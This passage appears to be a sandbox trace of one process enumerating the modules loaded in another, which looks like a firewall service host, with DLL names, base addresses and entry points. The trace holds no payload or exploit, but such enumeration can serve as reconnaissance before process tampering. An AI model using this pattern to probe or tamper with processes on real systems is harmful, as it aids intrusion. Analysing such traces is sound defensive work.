lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0077.145] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0077.146] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x260bd50, cb=0x18 | out: lpmodinfo=0x260bd50*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0077.147] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0077.148] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0077.149] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x260df00, cb=0x18 | out: lpmodinfo=0x260df00*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0077.150] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0077.151] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0077.152] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x26100c0, cb=0x18 | out: lpmodinfo=0x26100c0*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0077.153] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0077.154] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0077.155] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x2612280, cb=0x18 | out: lpmodinfo=0x2612280*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0077.156] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0077.157] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0077.159] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x2614440, cb=0x18 | out: lpmodinfo=0x2614440*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0077.160] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0077.163] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0077.164] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x2616610, cb=0x18 | out: lpmodinfo=0x2616610*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0077.165] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0077.169] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0077.171] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa8a0000, lpmodinfo=0x24266a8, cb=0x18 | out: lpmodinfo=0x24266a8*(lpBaseOfDll=0x7fefa8a0000, SizeOfImage=0xb0000, EntryPoint=0x7fefa8b28b0)) returned 1 [0077.172] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa8a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="bfe.dll") returned 0x7 [0077.173] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa8a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\bfe.dll" (normalized: "c:\\windows\\system32\\bfe.dll")) returned 0x1b [0077.175] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd260000, lpmodinfo=0x2428970, cb=0x18 | out: lpmodinfo=0x2428970*(lpBaseOfDll=0x7fefd260000, SizeOfImage=0x2f000, EntryPoint=0x7fefd261064)) returned 1 [0077.177] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd260000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="AUTHZ.dll") returned 0x9 [0077.178] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd260000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\AUTHZ.dll" (normalized: "c:\\windows\\system32\\authz.dll")) returned 0x1d [0077.180] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb320000, lpmodinfo=0x242ab30, cb=0x18 | out: lpmodinfo=0x242ab30*(lpBaseOfDll=0x7fefb320000, SizeOfImage=0xb000, EntryPoint=0x7fefb324f8c)) returned 1 [0077.181] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb320000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="slc.dll") returned 0x7 [0077.182] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb320000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")) returned 0x1b [0077.184] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x242cce0, cb=0x18 | out: lpmodinfo=0x242cce0*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0077.185] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0077.187] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0077.188] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc80000, lpmodinfo=0x242eea0, cb=0x18 | out: lpmodinfo=0x242eea0*(lpBaseOfDll=0x7fefcc80000, SizeOfImage=0xd000, EntryPoint=0x7fefcc81348)) returned 1 [0077.190] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc80000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="pcwum.dll") returned 0x9 [0077.197] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc80000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")) returned 0x1d [0077.199] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x2431060, cb=0x18 | out: lpmodinfo=0x2431060*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0077.200] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0077.202] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0077.204] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa760000, lpmodinfo=0x2433230, cb=0x18 | out: lpmodinfo=0x2433230*(lpBaseOfDll=0x7fefa760000, SizeOfImage=0xce000, EntryPoint=0x7fefa761e18)) returned 1 [0077.205] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa760000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="mpssvc.dll") returned 0xa [0077.207] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa760000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\mpssvc.dll" (normalized: "c:\\windows\\system32\\mpssvc.dll")) returned 0x1e [0077.209] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc950000, lpmodinfo=0x24353f0, cb=0x18 | out: lpmodinfo=0x24353f0*(lpBaseOfDll=0x7fefc950000, SizeOfImage=0xbb000, EntryPoint=0x7fefc956de0)) returned 1 [0077.211] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc950000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="FirewallAPI.dll") returned 0xf [0077.212] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc950000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")) returned 0x23 [0077.214] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc940000, lpmodinfo=0x24375d8, cb=0x18 | out: lpmodinfo=0x24375d8*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0077.216] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc940000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0077.218] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc940000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0077.219] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac50000, lpmodinfo=0x2439798, cb=0x18 | out: lpmodinfo=0x2439798*(lpBaseOfDll=0x7fefac50000, SizeOfImage=0x53000, EntryPoint=0x7fefac52b98)) returned 1 [0077.221] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac50000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0077.232] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac50000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\fwpuclnt.dll" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")) returned 0x20 [0077.235] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9c0000, lpmodinfo=0x243b968, cb=0x18 | out: lpmodinfo=0x243b968*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0077.237] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9c0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0077.239] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9c0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0077.242] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9a0000, lpmodinfo=0x243db18, cb=0x18 | out: lpmodinfo=0x243db18*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0077.244] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0077.245] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0077.247] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff2d0000, lpmodinfo=0x243fce8, cb=0x18 | out: lpmodinfo=0x243fce8*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0077.249] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff2d0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0077.251] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff2d0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0077.253] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd610000, lpmodinfo=0x2441ea8, cb=0x18 | out: lpmodinfo=0x2441ea8*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0077.255] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd610000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0077.258] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd610000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0077.260] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc70000, lpmodinfo=0x2444068, cb=0x18 | out: lpmodinfo=0x2444068*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0077.262] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc70000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0077.264] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc70000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0077.266] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb20000, lpmodinfo=0x2446228, cb=0x18 | out: lpmodinfo=0x2446228*(lpBaseOfDll=0x7fefcb20000, SizeOfImage=0x1e000, EntryPoint=0x7fefcb213b8)) returned 1 [0077.268] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb20000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="USERENV.dll") returned 0xb [0077.273] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb20000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USERENV.dll" (normalized: "c:\\windows\\system32\\userenv.dll")) returned 0x1f [0077.276] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd780000, lpmodinfo=0x24483e8, cb=0x18 | out: lpmodinfo=0x24483e8*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0077.278] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd780000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0077.280] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd780000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0077.283] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb00000, lpmodinfo=0x244a7c0, cb=0x18 | out: lpmodinfo=0x244a7c0*(lpBaseOfDll=0x7fefcb00000, SizeOfImage=0x1b000, EntryPoint=0x7fefcb02068)) returned 1 [0077.285] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb00000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="GPAPI.dll") returned 0x9 [0077.287] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb00000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GPAPI.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")) returned 0x1d [0077.290] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff970000, lpmodinfo=0x244c980, cb=0x18 | out: lpmodinfo=0x244c980*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0077.292] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff970000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0077.294] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff970000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0077.297] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb270000, lpmodinfo=0x244eb40, cb=0x18 | out: lpmodinfo=0x244eb40*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0077.299] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb270000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0077.301] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb270000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0077.304] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb260000, lpmodinfo=0x2450d10, cb=0x18 | out: lpmodinfo=0x2450d10*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0077.307] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb260000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0077.309] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb260000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0077.312] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac20000, lpmodinfo=0x2452ed0, cb=0x18 | out: lpmodinfo=0x2452ed0*(lpBaseOfDll=0x7fefac20000, SizeOfImage=0x11000, EntryPoint=0x7fefac216ac)) returned 1 [0077.315] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac20000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0077.331] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac20000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")) returned 0x21 [0077.333] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac00000, lpmodinfo=0x24550a0, cb=0x18 | out: lpmodinfo=0x24550a0*(lpBaseOfDll=0x7fefac00000, SizeOfImage=0x18000, EntryPoint=0x7fefac01bf8)) returned 1 [0077.336] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac00000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0077.339] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac00000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")) returned 0x20 [0077.341] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd010000, lpmodinfo=0x2457270, cb=0x18 | out: lpmodinfo=0x2457270*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0077.344] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd010000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0077.347] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd010000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0077.350] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefca10000, lpmodinfo=0x2459430, cb=0x18 | out: lpmodinfo=0x2459430*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0077.352] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefca10000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0077.355] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefca10000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0077.358] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd000000, lpmodinfo=0x245b618, cb=0x18 | out: lpmodinfo=0x245b618*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0077.361] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd000000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0077.365] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd000000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0077.368] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa5c0000, lpmodinfo=0x245d7d8, cb=0x18 | out: lpmodinfo=0x245d7d8*(lpBaseOfDll=0x7fefa5c0000, SizeOfImage=0xa000, EntryPoint=0x7fefa5c3dd4)) returned 1 [0077.371] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa5c0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wfapigp.dll") returned 0xb [0077.374] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa5c0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wfapigp.dll" (normalized: "c:\\windows\\system32\\wfapigp.dll")) returned 0x1f [0077.377] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa350000, lpmodinfo=0x245f998, cb=0x18 | out: lpmodinfo=0x245f998*(lpBaseOfDll=0x7fefa350000, SizeOfImage=0x2c000, EntryPoint=0x7fefa3556f8)) returned 1 [0077.380] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa350000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="dps.dll") returned 0x7 [0077.383] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa350000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\dps.dll" (normalized: "c:\\windows\\system32\\dps.dll")) returned 0x1b [0077.385] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdf90000, lpmodinfo=0x2461b48, cb=0x18 | out: lpmodinfo=0x2461b48*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0077.388] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdf90000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0077.393] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdf90000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0077.396] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff360000, lpmodinfo=0x2463d18, cb=0x18 | out: lpmodinfo=0x2463d18*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0077.399] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff360000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0077.402] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff360000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0077.405] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb4e0000, lpmodinfo=0x2465ed8, cb=0x18 | out: lpmodinfo=0x2465ed8*(lpBaseOfDll=0x7fefb4e0000, SizeOfImage=0x127000, EntryPoint=0x7fefb4e10ec)) returned 1 [0077.408] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb4e0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="taskschd.dll") returned 0xc [0077.413] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb4e0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")) returned 0x20 [0077.416] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb800000, lpmodinfo=0x24680a8, cb=0x18 | out: lpmodinfo=0x24680a8*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0077.419] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb800000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0077.422] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb800000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0077.425] GetModuleInformation (in: hProcess=0x218, hModule=0x7feffae0000, lpmodinfo=0x246a268, cb=0x18 | out: lpmodinfo=0x246a268*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0077.428] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feffae0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0077.431] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feffae0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0077.435] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa1b0000, lpmodinfo=0x246c428, cb=0x18 | out: lpmodinfo=0x246c428*(lpBaseOfDll=0x7fefa1b0000, SizeOfImage=0x19000, EntryPoint=0x7fefa1b2b50)) returned 1 [0077.438] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa1b0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wdi.dll") returned 0x7 [0077.441] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa1b0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll")) returned 0x1b [0077.444] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa5e0000, lpmodinfo=0x246e5d8, cb=0x18 | out: lpmodinfo=0x246e5d8*(lpBaseOfDll=0x7fefa5e0000, SizeOfImage=0x14a000, EntryPoint=0x7fefa5e1100)) returned 1 [0077.448] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa5e0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="diagperf.dll") returned 0xc [0077.451] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa5e0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\diagperf.dll" (normalized: "c:\\windows\\system32\\diagperf.dll")) returned 0x20 [0077.454] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef92c0000, lpmodinfo=0x24707a8, cb=0x18 | out: lpmodinfo=0x24707a8*(lpBaseOfDll=0x7fef92c0000, SizeOfImage=0x8000, EntryPoint=0x7fef92c22f8)) returned 1 [0077.458] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef92c0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="pnpts.dll") returned 0x9 [0077.461] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef92c0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\pnpts.dll" 